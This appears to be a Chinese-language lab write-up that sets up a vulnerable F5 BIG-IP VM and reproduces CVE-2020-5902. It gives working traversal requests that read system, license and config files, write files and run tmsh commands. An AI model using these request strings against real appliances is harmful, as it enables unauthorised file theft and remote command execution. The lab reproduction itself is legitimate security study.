F5 BIG-IP CVE-2020-5902漏洞复现

(Updated: )
F5 BIG-IPCVE-2020-5902
, , ,

环境搭建:

注册登录f5.com

下载链接:http://downloads05.f5.com/esd/download.sv?loc=downloads05.f5.com/downloads/2d436b59-25af-43c4-ab3f-9ebb1d6f5ee6/BIGIP-14.1.2-0.0.37.ALL-scsi.ova

本站下载链接:(http://rita888.github.io/download/BIGIP-14.1.2-0.0.37.ALL-scsi.ova)

下载完成,虚拟机导入:

image-20200708125734115

image-20200708140122139

选择部署选项

image-20200708125846124

等待开机

image-20200708140440711

输入默认用户名:root 和密码:default,输入后要重置密码随意【bigip123】

image-20200708140545061

输入config后进入界面点击OK,选择IPv4

image-20200708140728897

选择是否用默认地址,我选择NO,然后设置IP配置信息(虚拟机设置我用了net模式后重启)

image-20200708140831644

宿主机登录,注意是https

image-20200708173628387

登录用admin/admin失败,百度查询方法,命令行重置admin然后登录成功

image-20200708173710407

稍等界面出来,然后点击next激活

image-20200708173830592

F5官网注册登录后获取的key,通过邮件得到(没有注册响应先注册)

image-20200708174255634

输入key,点击manual、next

image-20200708174455250

获取到Dossier,然后step2点击链接,获取license

image-20200708174953810

复制粘贴license

image-20200708175126760

等待重置成功即可。

复现:

任意文件读取:

1
2
3
4
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf

image-20200708181910106

文件上传:

1
2
3
4
# Save接口
/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=Vultest
# Read接口
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/test

上传无反馈:https://192.168.116.144/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=Vultest

读取:

image-20200708185748081

RCE:

1
2
# tmsh接口
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

image-20200708185449918

参考链接:

http://www.hackdig.com/07/hack-100823.htm

https://blog.csdn.net/wuyou1995/article/details/107170186